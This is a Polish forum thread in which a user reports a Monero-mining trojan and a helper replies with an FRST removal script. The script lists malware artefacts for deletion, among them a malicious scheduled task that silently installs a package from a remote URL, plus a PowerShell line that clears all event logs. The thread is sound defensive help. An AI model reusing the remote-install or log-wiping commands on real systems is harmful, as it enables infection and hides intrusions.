Wirusy - zawieszanie komputera

donass · 21 Grudnia 2018

Witajcie,

Otóż od kilku dni, komputer dosłownie staje w miejscu w różnych momentach (w trybie awaryjnym jest ok)

Zainstalowany Malwarebytes wykrywa ciągle wirusa o nazwie:

Cytat


Kategoria: Trojan
Domena: pool.monero.hashvault.pro
Adres IP: 37.187.163.200
Port: [49311]
Typ: Wychodzące
Plik: C:\Windows\SysWOW64\InstallShield\setup.exe

Wyczytałem w google że to jakaś koparka BitCoin ? , dodatkowo właśnie zauważyłem że 2 rdzenie są obciążone do 100% (dodatkowo wtedy słyszę podwyższoną prace wentylatorów) (sprawdzałem to innym programem - pcrview , niż ten wbudowany w windows menedżer zadań )bo gdy tylko włączę program menedżer zadań procesy spadają , tak jakby celowo na uruchomienie menedżera zadań wirusy się wyłączał aby nie można było usunąć jego uruchomionego procesu. A proces który jest odpowiedzialny za te obciążanie komputera jest w ścieżce jak powyżej w cytacie czyli: C:\Windows\SysWOW64\InstallShield\setup.exe, po jego zakończeniu wraca zaraz ponownie

Dodaje logi ( skan zrobiony w trybie awaryjnym bo podczas uruchomienia FRST w trybie normalnym komputer zawisał ):

proszę o pomoc

FRST.txt

Shortcut.txt

Addition.txt

jessica · 21 Grudnia 2018

Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.
Otworzy się Notatnik - wklej do niego:

Spoiler

2018-12-11 11:12 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\C61WSASJA8
2018-12-11 11:12 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\wuma4pcz0ri
2018-12-11 11:08 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\6W9ROT2YPY
2018-12-11 11:08 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\jepesmqlhni
2018-12-11 11:05 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\SP243SXYIN
2018-12-11 11:05 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\i0alkiex4u0
2018-12-11 10:55 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\LGHNMQ7DFQ
2018-12-11 10:55 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\fo4dkoc2nsx
2018-12-11 10:54 - 2018-12-20 14:07 - 000000000 ____D C:\Program Files (x86)\foldershare
2018-12-11 10:54 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\OK0U934KFM
2018-12-11 10:54 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\h22rsvnb5ov
2018-12-11 10:54 - 2018-12-11 12:05 - 000000000 ____D C:\Program Files (x86)\FromAshes
2018-12-11 10:54 - 2018-12-11 10:54 - 000000003 _____ C:\Users\pc\AppData\Local\wbem.ini
2018-12-11 11:51 - 2018-12-11 11:57 - 000000004 _____ () C:\ProgramData\lock.dat
2018-12-11 11:51 - 2018-12-11 11:51 - 000000008 _____ () C:\ProgramData\ts.dat
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\pc\LTLeeOi.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\HFOyevDOOafRJ.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\pc\AppData\Local\yovaLIoYKRdHi.exe
Task: {81FE7175-84AC-4EC3-A193-BE691207220E} - System32\Tasks\{244EF55E-D569-E81D-0963-7EF90BE808AF} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/41S0FPai.jiX /q
Task: {C3F98DE7-42ED-40F0-AEA9-39ADCDCEAC4E} - System32\Tasks\wufuc.{72EEE38B-9997-42BD-85D3-2DD96DA17307} => "C:\Windows\system32\rundll32.exe" "C:\Program Files\wufuc\wufuc64.dll",RUNDLL32_Start
C:\Program Files\wufuc
MSCONFIG\startupreg: 1492035 => "C:\Users\pc\AppData\Roaming\i0alkiex4u0\uuejapyf2uf.exe" /VERYSILENT
MSCONFIG\startupreg: 1883899 => "C:\Users\pc\AppData\Roaming\h22rsvnb5ov\inbpxzbkm5j.exe" /VERYSILENT
MSCONFIG\startupreg: 207368 => "C:\Users\pc\AppData\Roaming\fo4dkoc2nsx\y2kv0vkuh04.exe" /VERYSILENT
MSCONFIG\startupreg: 49QO9U23U0LOB8B => "C:\Program Files\C61WSASJA8\C61WSASJA.exe"
MSCONFIG\startupreg: 4Kzc'47yh+.exe => C:\Program Files\WhoCrashed\T3TD3C6NVVAPCLVHQDLCDUDAA4\4Kzc'47yh+.exe
C:\Users\pc\AppData\Roaming\i0alkiex4u0
C:\Users\pc\AppData\Roaming\h22rsvnb5ov
C:\Users\pc\AppData\Roaming\fo4dkoc2nsx
C:\Program Files\C61WSASJA8
C:\Program Files\WhoCrashed
MSCONFIG\startupreg: ANGTZQZB7DV29WT => "C:\Program Files\SP243SXYIN\N3KCVWNHD.exe"
MSCONFIG\startupreg: AVRZJBPC1A57AO6 => "C:\Program Files\OK0U934KFM\OK0U934KF.exe"
MSCONFIG\startupreg: DivineBird => "C:\Windows\rss\csrss.exe"
C:\Program Files\SP243SXYIN
C:\Program Files\OK0U934KFM
C:\Windows\rss\csrss.exe
MSCONFIG\startupreg: ZNBQ91HYXY2UALM => "C:\Program Files\LGHNMQ7DFQ\LGHNMQ7DF.exe"
C:\Program Files\LGHNMQ7DFQ
FirewallRules: [{B266D160-C354-4173-BBBC-03211E58D8F8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{20CE4732-3B1E-457A-9FE7-9A26DB9C5AE3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6BBAB765-BD10-4A97-BE44-54412A1E9703}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{93932677-51BB-4DBE-8096-FAA4E6C47E6F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{52398C9B-5132-42CD-A9C7-E905EE605D91}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7036998E-7DD4-46AE-B75B-27D06D7C4CFD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AA08F4BD-087B-47AE-A094-22CB732C0A34}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1C9734EF-7E5D-4AC2-8012-D1D51C2B395D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FE6BE613-B773-4359-AFAC-FB1B4131C231}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{FCCBDFC4-A7B7-4B05-BC0A-06D9D99A31EA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4D4E0E09-7619-4452-B34B-0292199380D5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4F55ED3E-E6CA-4DCC-BC06-139849AEB788}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{4B637E1B-9058-4280-BFF2-9B5364A4C855}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{60E335A6-04B9-4C99-89D9-1240560BAB16}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A5AEF0B4-81F9-48AE-9FC2-BE03E80B95F1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{191272B5-8636-43E8-B25A-72AD5B806C68}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7D489058-EF9C-467C-B44E-176B90D71555}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3F8D75FF-A07B-4A1F-A4CE-B65FBBBA1E9E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CCBFE6BF-1E21-421E-8E4F-8297F83F058B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FD3440DA-C0C8-4F84-BABC-48B3D9B472CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C9C964E9-91DE-4C1E-9295-1A2E6628C315}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{ECA63CE5-5502-4B30-AE27-02BEF71692CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6C1E6D00-44D9-41A1-AEFC-91395FBED15D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CBC7D6F0-E348-4483-9E16-9060F3A9D69F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2BAB6FE1-79C3-445B-BBC6-E689D5E7575A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{092855A4-9A60-429D-B240-C7CA2205E02A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{621E7524-A500-4AD5-B715-2D99D9D65762}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F39804FF-704D-42FC-91AD-2E66587ACAD5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{273DFF5F-8FCA-4851-A652-C77FD54D5B9F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D418CD09-8191-4096-B8CF-C27CADB087E1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{9773C8C1-9D64-4AE9-89A0-C0D3501E0143}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{894738A4-F8DD-43F1-92B1-EA90F5411BB8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7FBB1656-D366-4AD1-8FCE-EA10B992F6C2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8D07C320-53E6-4137-AB37-9D79054DACE3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{77B4C10D-DD1F-4077-ACCA-C974D8272072}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5BE5EC97-226E-4EFC-93A3-91CA64FDDAAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{3BFB5F01-80B0-4448-8BD2-4F42C84E7CC2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{28776DB9-5ADA-4A7A-83D6-143793E5953F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7E1EE1CE-AB30-4BDD-89C7-840152037D9B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{56AAB93C-970E-4B66-9508-A94265DDBFF1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{850D06A3-146F-4CAC-94F4-76F8F737CBB3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{282F4459-4971-473B-92CE-3A56B0D8DD45}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{E0B10EC6-D91B-4493-AD12-B63A2166D8AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{365991E7-A2AC-43B2-8530-4588A16D2938}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1544557D-3AE1-484C-AC09-7C0CC07ACF35}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{228BF192-9235-444D-B3E1-F6D51E38019D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3567AC65-9820-4F70-8CC7-3FB3FBA1E76D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{366A2DCA-7B1F-4C36-BAAF-3EDC93DBF7B7}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{357635CF-2051-4D7A-833E-855DB08FDD8E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7007D27D-8D9F-4048-881D-17804F021DAE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2094A8A7-938B-4267-850B-981DC42BA978}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0BF7F884-8F5D-4412-9FBD-670B5AABA472}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F540FF9F-9FC2-44FC-BB93-24C3BFE77D89}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F27A6A10-341A-4E95-BF42-E520A0B8EDA1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{6DDF9E82-A539-4093-ADA8-9483E0EE906A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9F179B3A-9F90-4023-A276-910885D284A5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3F5AEFA7-EF46-41EB-A6D1-8BB970B35023}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{21580474-CEC9-4A32-8225-4E39EAE946AD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1BB8C87D-D86D-44DE-A757-EBFC5772E930}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{36A2E25C-4F24-4688-8638-72FC233F7942}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F586D436-72A6-42D7-BEC8-7A9BBA528824}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{043E3B9B-7259-43D3-BE9D-F856154C139D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{49F43CA6-0ABB-4B99-969F-662FE5ABE449}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2DB22618-86A5-40C3-9F1F-757DDCF89236}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9F1C3F5D-70E9-495C-9E7D-A5DF9F4B8DC8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E460405A-5C3A-46EA-9D65-57C7A42BA600}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DC432ADD-A6CE-437E-A129-7605A8AC89CC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BACEF838-AFA3-4358-851E-F9D32D6641A6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{28E77A6B-B32B-4CF4-83E4-001CF5D6838B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F40B8917-34EE-4B97-A039-0F0F6D70FBA8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B5FEAAD9-B6C9-479E-8A5E-F67DC403C32E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A7F1FF60-28FC-4285-B2C5-C4DFAC66097E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{BA3F04A3-F6E5-486E-ADF1-992E048EEECF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D6B0F806-E39C-42D1-AA2B-3F595317E0E8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{438D2120-4134-4E85-9012-04C95A84E783}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{25AF8029-548C-45AB-9F6A-D5AEC4F0AC60}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7970BF22-578B-4A2D-A8E3-B10AEDA79BBA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6F3AEEFA-532F-4090-AE21-F064F29365F5}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{789623AB-C41D-45BC-BD54-3F9B781E749B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5551595C-4C2F-40A3-A0A1-29C1FB77DDBE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7C5AB4FC-870A-4B83-91BB-2D7D4148A624}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{661C654F-6775-462F-9B3B-AF04691F6754}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D070C419-38C1-4352-A30A-9DFBEE56BFC8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A7E654F9-BE7E-4F84-9F35-E33DD0C90CD2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F95E2AB7-33D1-4C41-8097-98EF46EF1DC4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D7678B89-1FF3-4C97-A495-25AD05DE9AFD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{538ADE50-5447-47E1-BCFD-2BBCC62387CB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{4604E815-3014-4FFB-B557-971FA2CCC375}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{636CACB5-521E-4815-B762-AA6E502248AA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FFF3B557-B880-4D57-ADF1-87D1141087CD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0DABEEA8-3CC6-4F0C-B2E0-B10228F27B96}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8F18CB62-174E-4BA1-8500-5292EDBDFA00}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0230D643-63FA-4E03-A437-E2D0F9535CF3}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{6CC0CBFF-FA1A-451D-B337-347743177C09}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{73C9471D-08EA-4C6B-AA82-74B1BD5591A7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{14FA0F86-0A65-41A8-B8D1-9031A84C9301}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{29D137FD-9C51-4653-8703-0420437A9E19}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7EB10A76-8F90-42C5-82A7-8AD25419AA7A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BB96A288-FAD2-40E6-A8A5-D21E54CA8658}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C693FD23-65FE-45ED-8307-E87430E5B33E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B526B7C2-76CF-481E-8AD0-2C7AF72DAD90}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7BD4C720-A996-4A25-A6FD-F702419FCF12}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{314C90D1-73DA-42D3-A9C9-6D11AF15E309}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{831C1556-34CF-468A-9D57-79B21768315E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EEE01EC0-C46F-4A57-B6DA-4CEAA60D0AD5}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7104B234-67DF-4CBD-8D66-1B2ACEE78A7E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{31F96718-3485-4F77-9D1A-DF889E787DA4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D9BB50F6-F0B7-4BE4-8488-2467834DB29E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7FFB158C-49AF-419E-A381-F3CCEE9B9E45}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AB7BFAB9-C9B2-40E9-AE67-6F4217323528}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{82B237CB-E80E-4613-A77D-91C8E6FD99BD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{B42FD383-E478-4F2A-9BAA-94D2C146C142}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{21F7BB5D-EB38-44E8-BA1D-9E937C2997A5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FAAC1EFD-0C9E-4A2E-94A5-1B23580127EC}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{71169FAA-0980-4CC2-AFB0-9DE4F14DAEA3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FDBA4AB1-DA4A-48CE-8F14-16249C5EAAEE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1F923F65-2C65-46C7-92F6-273270F694F4}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{61E42A63-CBFA-4BF1-8BC8-50F947EDE9ED}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{53905476-8C38-412F-906B-C4A1E255F8CF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{12E934D4-F3DE-4456-B474-CC1E8460D938}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DCDE8369-5A54-46E6-84F3-29A311514921}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AEB54C4D-36FF-49A3-B57C-296DCF543FA7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{67BCBA00-5294-4CA6-B71E-1678B4516F5E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{76BDEED2-CA46-4213-A0E5-BEA893C008F2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{082E3529-645F-4173-BE54-5D95CB331E55}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8AC3FE4B-6269-409A-989A-4F0C4387AF77}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{038E6342-7B21-44BC-827A-418C0C79BF67}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F775CC4E-6438-48B6-A678-55763C23D4D5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4B04F25F-0B19-486D-9427-A6F2509F4665}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
C:\Windows\SysWOW64\InstallShield\setup.exe
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
FF Extension: (Brak nazwy) - C:\Program Files\Mozilla Firefox\browser\features\{A16C6B13-D41C-47BF-AAC2-FC71F1BB2363}.xpi [2018-12-11] [Brak podpisu cyfrowego]
S3 ALSysIO; \??\C:\Users\pc\AppData\Local\Temp\ALSysIO64.sys [X] <==== UWAGA
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz148; \??\C:\Windows\temp\cpuz148\cpuz148_x64.sys [X]
S3 GPU-Z; \??\C:\Users\pc\AppData\Local\Temp\GPU-Z.sys [X] <==== UWAGA
S3 MBAMFarflt; system32\DRIVERS\farflt.sys [X]
S3 MBAMWebProtection; system32\DRIVERS\mwac.sys [X]
ShortcutWithArgument: C:\Users\pc\Desktop\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\Desktop\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_pbdcmagkbhnjpjlnpibbmggikpedpilc\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\NACL Web Plug-in (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
C:\Users\Public\Desktop\FxSound Enhancer.lnk
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Zrób nowe logi FRST.

jessi

Zaloguj się

Wirusy - zawieszanie komputera

Rekomendowane odpowiedzi

donass

Odnośnik do komentarza

jessica

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Zarejestruj nowe konto

Zaloguj się

Ostatnio przeglądający 0 użytkowników

Przeglądaj

Cała aktywność